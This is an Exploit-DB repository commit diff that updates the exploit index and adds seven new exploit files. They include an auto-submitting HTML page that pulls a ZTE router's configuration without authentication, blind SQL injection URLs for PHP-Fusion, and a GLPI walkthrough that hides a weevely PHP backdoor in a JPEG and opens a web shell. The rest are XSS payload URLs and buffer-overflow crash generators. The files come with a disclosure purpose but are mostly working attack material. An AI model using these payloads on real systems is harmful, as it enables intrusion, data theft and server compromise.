DB: 2015-10-07

7 new exploits

files.csv

@@ -12912,7 +12912,7 @@ id,file,description,date,author,platform,type,port
 14743,platforms/windows/local/14743.c,"avast! <= 5.0.594 license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0
 14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking Vulnerabilities",2010-08-25,Dr_IDE,windows,local,0
 14750,platforms/windows/local/14750.txt,"VLC Media Player DLL Hijacking Exploit (wintab32.dll)",2010-08-25,Secfence,windows,local,0
-14751,platforms/windows/local/14751.txt,"Microsoft Vista BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll)",2010-08-25,"Beenu Arora",windows,local,0
+14751,platforms/windows/local/14751.txt,"Microsoft Vista - BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll)",2010-08-25,"Beenu Arora",windows,local,0
 14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 DLL Hijacking Exploit (homeutils9.dll)",2010-08-25,"Beenu Arora",windows,local,0
 14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0
 14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 DLL Hijacking Exploit (cpqdvd.dll)",2010-08-25,"Beenu Arora",windows,local,0
@@ -23061,7 +23061,7 @@ id,file,description,date,author,platform,type,port
 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0
 25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0
 25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0
-25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring - Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
+25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
 25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0
 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
@@ -29372,7 +29372,7 @@ id,file,description,date,author,platform,type,port
 32588,platforms/php/webapps/32588.txt,"BoutikOne CMS 'search_query' Parameter Cross-Site Scripting Vulnerability",2008-11-17,d3v1l,php,webapps,0
 32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80
 32589,platforms/php/webapps/32589.html,"Kimson CMS 'id' Parameter Cross-Site Scripting Vulnerability",2008-11-18,md.r00t,php,webapps,0
-32590,platforms/windows/local/32590.c,"Microsoft Windows Vista 'iphlpapi.dll' Local Kernel Buffer Overflow Vulnerability",2008-11-19,"Marius Wachtler",windows,local,0
+32590,platforms/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow Vulnerability",2008-11-19,"Marius Wachtler",windows,local,0
 32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE Multiple Security Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0
 32592,platforms/php/webapps/32592.txt,"Easyedit CMS subcategory.php intSubCategoryID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0
 32593,platforms/php/webapps/32593.txt,"Easyedit CMS page.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0
@@ -34686,3 +34686,10 @@ id,file,description,date,author,platform,type,port
 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080
 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0
 38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0
+38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0
+38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0
+38406,platforms/php/webapps/38406.txt,"PHP-Fusion <= v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
+38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - RCE Through File Upload Filter Bypass",2015-10-06,"Raffaele Forte",php,webapps,0
+38408,platforms/php/webapps/38408.txt,"Jaow CMS 'add_ons' Parameter Cross Site Scripting Vulnerability",2013-03-23,Metropolis,php,webapps,0
+38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
+38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin 'wpbanners_show.php' HTML Injection Vulnerability",2013-03-25,"Fernando A. Lagos B",php,webapps,0

platforms/hardware/webapps/38409.html

@@ -0,0 +1,52 @@
+<!-- 
+   ZTE ZXHN H108N unauthenticated config download
+
+   Copyright 2015 (c) Todor Donev
+   todor.donev@gmail.com
+   http://www.ethical-hacker.org/
+   https://www.facebook.com/ethicalhackerorg
+   http://pastebin.com/u/hackerscommunity
+  
+   Tested device:
+   Model                           ZXHN H108N
+   Software Version                V3.3.0_MU
+
+   Description:
+   Does not check cookies and credentials on POST
+   method so attackers could download the config 
+   file without authentication.
+
+                      \!/\!/\!/
+   Use at your own                Use at your own
+ risk and educational 	        risk and educational
+    purpose ONLY!                  purpose ONLY!
+
+   Disclaimer:
+   This or previous program is for Educational
+   purpose ONLY. Do not use it without permission.
+   The usual disclaimer applies, especially the
+   fact that Todor Donev is not liable for any
+   damages caused by direct or indirect use of the
+   information or functionality provided by these
+   programs. The author or any Internet provider
+   bears NO responsibility for content or misuse
+   of these programs or any derivatives thereof.
+   By using these programs you accept the fact
+   that any damage (dataloss, system crash,
+   system compromise, etc.) caused by the use
+   of these programs is not Todor Donev's
+   responsibility.
+  
+   Use at your own                Use at your own 
+ risk and educational           risk and educational
+    purpose ONLY!                  purpose ONLY!
+                      /i\/i\/i\
+-->
+<html>
+<title>ZTE ZXHN H108N unauthenticated config download</title>
+<body onload=javascript:document.ethack.submit()>
+<p>ZTE ZXHN H108N  Exploiting..</p>
+<form name="ethack" method="POST" action="http://TARGET/getpage.gch?pid=101" enctype="multipart/form-data">
+<input type="hidden" name="config" id="config" value="">
+</body>
+</html>

platforms/php/webapps/38406.txt

@@ -0,0 +1,86 @@
+=============================================
+MGC ALERT 2015-002
+- Original release date: September 18, 2015
+- Last revised:  October 05, 2015
+- Discovered by: Manuel García Cárdenas
+- Severity: 7,1/10 (CVSS Base Score)
+=============================================
+
+I. VULNERABILITY
+-------------------------
+Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07
+
+II. BACKGROUND
+-------------------------
+PHP-Fusion is a lightweight open source content management system (CMS)
+written in PHP.
+
+III. DESCRIPTION
+-------------------------
+This bug was found using the portal with authentication as administrator.
+To exploit the vulnerability only is needed use the version 1.0 of the HTTP
+protocol to interact with the application. It is possible to inject SQL
+code in the variable "status" on the page "members.php".
+
+IV. PROOF OF CONCEPT
+-------------------------
+The following URL's and parameters have been confirmed to all suffer from
+Blind SQL injection.
+
+/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0
+
+Exploiting with true request (with mysql5):
+
+/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
+AND substr(@@version,1,1)='5
+
+Exploiting with false request:
+
+/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
+AND substr(@@version,1,1)='4
+
+V. BUSINESS IMPACT
+-------------------------
+Public defacement, confidential data leakage, and database server
+compromise can result from these attacks. Client systems can also be
+targeted, and complete compromise of these client systems is also possible.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+PHP-Fusion <= v7.02.07
+
+VII. SOLUTION
+-------------------------
+All data received by the application and can be modified by the user,
+before making any kind of transaction with them must be validated.
+
+VIII. REFERENCES
+-------------------------
+https://www.php-fusion.co.uk/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+September 18, 2015 1: Initial release
+October 10, 2015 2: Revision to send to lists
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
+September 18, 2015 2: Send to vendor
+September 24, 2015 3: Second mail to the verdor without response
+October   10, 2015 4: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester

platforms/php/webapps/38407.txt

@@ -0,0 +1,92 @@
+# Exploit Title: GLPI 0.85.5 RCE through file upload filter bypass
+# Date: September 7th, 2015
+# Exploit Author: Raffaele Forte <raffaele@backbox.org>
+# Vendor Homepage: http://www.glpi-project.org/
+# Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz
+# Version: GLPI 0.85.5
+# Tested on: CentOS release 6.7 (Final), PHP 5.3.3
+
+
+I. INTRODUCTION
+========================================================================
+
+GLPI is the Information Resource-Manager with an additional 
+Administration-Interface. You can use it to build up a database with an 
+inventory for your company (computer, software, printers...). It has 
+enhanced functions to make the daily life for the administrators easier, 
+like a job-tracking-system with mail-notification and methods to build a 
+database with basic information about your network-topology.
+
+
+II. DESCRIPTION
+========================================================================
+
+
+The application allows users to upgrade their own profile. The user has 
+the possibility to add a new photo as attachment.
+
+The photo that he uploads will be stored into "GLPI_ROOT/files/_pictures/". 
+
+This file, for example named "photo.jpeg", will be directly accessible 
+through "http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg", where "XXXX" 
+is an ID automatically generated by the system and visible in the HTML 
+source code.
+
+Besides, the server does not check the extension of the uploaded file, 
+but only the first bytes within it, that indicates which kind of file is.
+
+Exploiting this flaw, an attacker may upload a tampered jpeg file that 
+contains php code placed at the end of the file, so that, just changing 
+the file extention to ".php", by default the php code will be interpreted!
+ 
+To trigger this vulnerability it is necessary to have an account.
+
+This vulnerability is a combination of two issues:
+- predictable uploaded file names and path
+- upload of any kind of file, not limited to images
+
+
+III. PROOF OF CONCEPT
+========================================================================
+
+Generate backdoor:
+
+  user@backbox:~$ weevely generate pass123 /tmp/bd.php
+  user@backbox:~$ file /tmp/photo.jpeg 
+    /tmp/photo.jpeg: JPEG image data, JFIF standard 1.02
+  user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg
+  user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php
+
+Upload the new tampered photo in GLPI > Settings
+
+Run terminal to the target:
+
+  user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123
+
+
+IV. BUSINESS IMPACT
+========================================================================
+By uploading a interpretable php file, an attacker may be able to 
+execute arbitrary code on the server.
+
+This flaw may compromise the integrity of the system and/or expose 
+sensitive information.
+
+
+V. SYSTEMS AFFECTED
+========================================================================
+GLPI Version 0.85.5 is vulnerable (probably all previous versions)
+
+
+VI. VULNERABILITY HISTORY
+========================================================================
+September 7th, 2015: Vulnerability identification
+September 25th, 2015: Vendor notification
+
+
+VII. LEGAL NOTICES
+========================================================================
+The information contained within this advisory is supplied "as-is" with 
+no warranties or guarantees of fitness of use or otherwise. We accept no
+responsibility for any damage caused by the use or misuseof this 
+information.

platforms/php/webapps/38408.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58658/info
+
+Jaow CMS is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Jaow CMS 2.4.8 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/add_ons.php?add_ons=[XSS] 

platforms/php/webapps/38410.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/58671/info
+
+The Banners Lite plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 
+
+http://www.example.com/wordpress/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_<script>alert(/XSSProof-of-Concept/)</script> 

platforms/windows/dos/38404.py

@@ -0,0 +1,124 @@
+'''
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-LANWHOIS-BUFFER-OVERFLOW-10062015.txt
+
+
+Vendor:
+================================
+www.lantricks.com
+
+
+Product:
+================================
+LanWhoIs.exe 1.0.1.120
+
+LanWhoIs querys and returns domain (site) holder or IP address informations.
+
+
+Vulnerability Type:
+===================
+Buffer Overflow
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+======================
+
+LanWhoIs contains a file parsing stack buffer overflow vulnerability. The program has a whois_result.xml
+XML file located under the LanWhoIs directory. This file holds results returned from program queries. If
+LanWhoIs is installed under c:\ instead of 'Program Files' etc.. on shared PC and a non adminstrator user
+has access they can still edit the whois_result.xml, abusing the vuln program and possibly escalate privileges
+or run arbitrary code etc.
+
+e.g.
+
+<WhoisResult>
+  <Result>
+<QueryString>216.239.37.99</QueryString>
+    <ServerName>whois.arin.net</ServerName>
+    <QueryDate>02.01.2005 16:17:30</QueryDate>
+    <QueryType>-1</QueryType>
+ 
+We can exploit the program by injecting malicious payload into the <QueryString> node of the local XML file
+causing buffer overflow overwriting both pointers to the NSEH & SEH exception handlers & control EIP at about 676 bytes.
+
+e.g.
+
+<QueryString>AAAAAAAAAAAAAAAAAAAAAAAAAAAAA.....shellcode...etc..</QueryString>
+
+
+WinDbg stack dump....
+
+(2048.17cc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** WARNING: Unable to verify checksum for image00400000
+*** ERROR: Module load completed but symbols could not be loaded for image00400000
+eax=02bdfec8 ebx=02bdff14 ecx=02bdfecc edx=41414141 esi=00000000 edi=00000000
+eip=00404bc8 esp=02bdfc04 ebp=02bdfecc iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+
+image00400000+0x4bc8:
+00404bc8 8b4af8          mov     ecx,dword ptr [edx-8] ds:002b:41414139=????????
+0:011> !exchain
+02bdfed4: 52525252
+Invalid exception stack at 42424242
+
+registers...
+
+EAX 00000000
+ECX 52525252
+EDX 7714B4AD ntdll.7714B4AD
+EBX 00000000
+ESP 04D0F668
+EBP 04D0F688
+ESI 00000000
+EDI 00000000
+EIP 52525252
+
+
+POC code:
+==========
+
+Run below script, then copy and insert payload into <QueryString> </QueryString> XML node
+and run the application. Next, select the address in the Results window pane and then click Query button
+to run a whois lookup or use the 'F3' keyboard cmd to execute and KABOOOOOOOOOOOOOOOM!!!
+'''
+
+file=open("C:\\hyp3rlinx\\LanTricks\LanWhoIs\\HELL","w")
+payload="A"*676+"BBBB"+"RRRR"         <--------------------#KABOOOOOOOOOOOOOOOOOOM!!!
+file.write(payload)
+file.close()
+
+'''
+Public Disclosure:
+===================
+October 6, 2015  
+
+
+Exploitation Technique:
+=======================
+Local
+Tested on Windows 7 SP1
+
+
+Vulnerable Parameter:
+======================
+QueryString
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
+The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
+
+by hyp3rlinx
+'''

platforms/windows/dos/38405.py

@@ -0,0 +1,28 @@
+'''
+********************************************************************************************
+# Exploit Title: Last PassBroker Stack-based BOF
+# Date: 9/23/2015
+# Exploit Author: Un_N0n
+# Software Link: https://lastpass.com/download
+# Version: 3.2.16
+# Tested on: Windows 7 x86(32 BIT)
+********************************************************************************************
+
+[Steps to Produce the Crash]:
+1- open 'LastPassBroker.exe'.
+2- A Input-Box will appear asking for Email and Password,
+   In password field paste in the contents of crash.txt
+3- Hit Login.
+~Software will Crash.
+
+[Code to produce crash.txt]: 
+'''
+junk = "A"*66666
+file = open("CRASH.txt",'w')
+file.write(junk)
+file.close()
+
+'''
+> Vendor Notified, Fixed in latest Release.
+**********************************************************************************************
+'''

platforms/windows/local/32590.c

@@ -1,13 +1,12 @@
-source: http://www.securityfocus.com/bid/32357/info
+// source: http://www.securityfocus.com/bid/32357/info
 
+// Microsoft Windows Vista is prone to a buffer-overflow vulnerability because of insufficient boundary checks.
 
-Microsoft Windows Vista is prone to a buffer-overflow vulnerability because of insufficient boundary checks.
+// Local attackers could exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level privileges, but this has not been confirmed.
 
-Local attackers could exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level privileges, but this has not been confirmed.
+// Windows Vista SP1 is vulnerable to this issue.
 
-Windows Vista SP1 is vulnerable to this issue.
+// UPDATE (November 25, 2008): Since this issue may be exploitable only by members of the administrative group, the security implication of this issue may be negated. 
-
-UPDATE (November 25, 2008): Since this issue may be exploitable only by members of the administrative group, the security implication of this issue may be negated. 
 
 #define _WIN32_WINNT 0x0600
 #define WIN32_LEAN_AND_MEAN

platforms/windows/local/33593.c

@@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/38044/info
+// source: http://www.securityfocus.com/bid/38044/info
 
-Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel.
+// Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel.
 
-An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service.
+// An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service.
 
 // --------------------------------------------------------
 // Windows NtFilterToken() Double Free Vulnerability